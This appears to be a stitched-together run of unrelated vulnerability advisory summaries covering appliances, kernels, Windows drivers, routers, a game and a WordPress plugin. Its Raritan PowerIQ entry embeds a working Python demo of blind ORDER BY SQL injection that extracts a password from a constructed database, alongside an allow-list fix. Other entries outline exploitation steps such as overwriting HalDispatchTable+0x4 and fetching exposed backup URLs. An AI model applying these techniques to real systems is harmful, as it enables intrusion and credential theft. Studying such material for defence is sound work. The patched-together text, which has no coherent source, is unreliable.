Multiple persistent input validation web vulnerabilities and a filter bypass issue have been discovered in the Barracuda Networks WebFilter 610-Vx appliance web application. The vulnerabilities allow remote attackers to bypass the security filter and inject malicious script code that is stored on the application side (persistent, i.e. stored, cross-site scripting). The persistent input validation vulnerability is located in the `username` and `password` values of the `/cgi-mod/index.cgi` module; remote attackers are able to inject their own malicious persistent script code into these two values of `/cgi-mod/index.cgi`.
This code is kernel specific. On Ubuntu 12.04.0 LTS (3.2.0-23-generic), the following triggers the #GP in sysret and overwrites the #PF handler so that we land in our NOP sled mapped at 0x80000000. Once we have landed there, however, the IDT has been trashed. We can either attempt to restore it (then escalate privileges and execute our shellcode) or find something else to overwrite that transfers execution to our controlled user-space address. Since 3.10.something, the IDT is read-only anyway.
A race condition exists between updates to httpd's "scoreboard" and mod_status, leading to several critical scenarios such as a heap buffer overflow with a user-supplied payload and a heap memory leak that can disclose sensitive memory contents, including htaccess credentials, SSL certificate private keys and so on.
Improperly sanitized input may allow a remote authenticated attacker to execute arbitrary code on the GCM KVM switch. The device also allows any authenticated user to read arbitrary files, which can be located anywhere on the target filesystem.
A vulnerability within the BthPan module allows an attacker to write memory they control to an arbitrary location they choose (a write-what-where primitive). This can be used to overwrite the second pointer of HalDispatchTable (HalDispatchTable+0x4 on 32-bit Windows), which NtQueryIntervalProfile reaches through KeQueryIntervalProfile; calling NtQueryIntervalProfile afterwards therefore executes the attacker's code in kernel mode.
Raritan PowerIQ suffers from an unauthenticated SQL injection vulnerability in an endpoint used during initial configuration of the product's licensing. The endpoint remains available after the appliance has been fully configured. Both the 'sort' and 'dir' parameters are injectable. sqlmap identified the following injection points with a total of 1173 HTTP(s) requests.
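The following is an added example, not Raritan's code and not part of the advisory, that models the bug in a constructed in-memory SQLite database: the 'sort' and 'dir' values are interpolated into ORDER BY, which is exactly the place where ordinary parameter binding does not apply, and a truthy/falsy condition smuggled into the sort expression changes the row order, giving a one-bit oracle of the kind sqlmap drives when it reports a boolean-based blind injection. The table and column names (licenses, users, password_hash), the stored password and the allow-lists are assumptions made for the demo; the blind extraction loop is the general technique rather than anything specific the advisory shows. The hardened variant maps the untrusted values onto fixed identifiers and rejects everything else.

```python
import sqlite3
import string


def make_db():
    """Constructed stand-in for the appliance database (assumption: the real
    PowerIQ schema is not known here)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE licenses (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO licenses VALUES (1, 'bravo'), (2, 'alpha'), (3, 'charlie');
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        INSERT INTO users VALUES (1, 'admin', 'secret');
    """)
    return conn


def list_licenses_vulnerable(conn, sort, direction):
    """The pattern behind the advisory: sort/dir are concatenated into ORDER BY.
    ORDER BY targets cannot be bound as query parameters, so string building is
    the usual temptation and the usual bug."""
    sql = f"SELECT id, name FROM licenses ORDER BY {sort} {direction}"
    return [row[1] for row in conn.execute(sql)]


# Hardened version: the request value only selects a fixed identifier; the
# untrusted string itself never reaches the SQL text.
ALLOWED_SORT = {"id": "id", "name": "name"}
ALLOWED_DIR = {"asc": "ASC", "desc": "DESC"}


def list_licenses_hardened(conn, sort, direction):
    try:
        col = ALLOWED_SORT[sort.lower()]
        order = ALLOWED_DIR[direction.lower()]
    except KeyError:
        raise ValueError("invalid sort/dir parameter")
    sql = f"SELECT id, name FROM licenses ORDER BY {col} {order}"
    return [row[1] for row in conn.execute(sql)]


def oracle(conn, condition):
    """Boolean-based blind oracle through the 'sort' parameter: when `condition`
    is true the rows come back ordered by name, otherwise by id, so the order of
    the response leaks one bit per request."""
    payload = f"(CASE WHEN ({condition}) THEN name ELSE id END)"
    return list_licenses_vulnerable(conn, payload, "ASC") == ["alpha", "bravo", "charlie"]


def extract_password_blind(conn, max_len=16):
    """Recover the admin password one character at a time using the oracle.
    Alphabet is restricted to lowercase letters to keep the demo short."""
    recovered = ""
    for pos in range(1, max_len + 1):
        matched = None
        for ch in string.ascii_lowercase:
            cond = (f"(SELECT substr(password_hash,{pos},1) FROM users "
                    f"WHERE username='admin')='{ch}'")
            if oracle(conn, cond):
                matched = ch
                break
        if matched is None:        # substr() past the end returns '' -> no match
            break
        recovered += matched
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("normal:", list_licenses_vulnerable(db, "name", "ASC"))
    print("blind extraction:", extract_password_blind(db))
    try:
        list_licenses_hardened(db, "(CASE WHEN (1=1) THEN name ELSE id END)", "ASC")
    except ValueError as e:
        print("hardened:", e)
```

The same trick works through 'dir' (append the CASE expression as a second ORDER BY term after a fixed direction), which is why both parameters show up as injection points; the allow-list fix covers both because neither value is ever interpolated.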
A stack overflow vulnerability exists in World of Warcraft 3.3.5a that allows an attacker to execute arbitrary code by placing a malicious macros-cache.txt file in the WTF/Account/[AccountName] directory; the code runs on the target system when the game loads that file.
Ajin Abraham discovered multiple vulnerabilities in the MTS MBlaze Ultra Wi-Fi / ZTE AC3633 router, including login bypass, router credential theft, Wi-Fi password theft, CSRF, and password reset without the old password or a valid session. An attacker can exploit these vulnerabilities to gain unauthorized access to the router.
wpbackupplus creates its backup .zip files in a location that is not protected. To download all of the website's files, an attacker can browse to http://[SITE]/[PATH]/wp-content/uploads/wp-backup-plus/. To download the database backup, the attacker can use http://[SITE]/[PATH]/wp-content/uploads/wp-backup-plus/temp. The PoC is http://[SERVER]/wp-content/uploads/wp-backup-plus/temp/[DATABASE_NAME]_[DATE].sql.
A vulnerability within the MQAC module allows an attacker to write memory they control to an arbitrary location they choose (a write-what-where primitive). This can be used to overwrite HalDispatchTable+0x4, the pointer NtQueryIntervalProfile dereferences via KeQueryIntervalProfile, and execute arbitrary code by subsequently calling NtQueryIntervalProfile.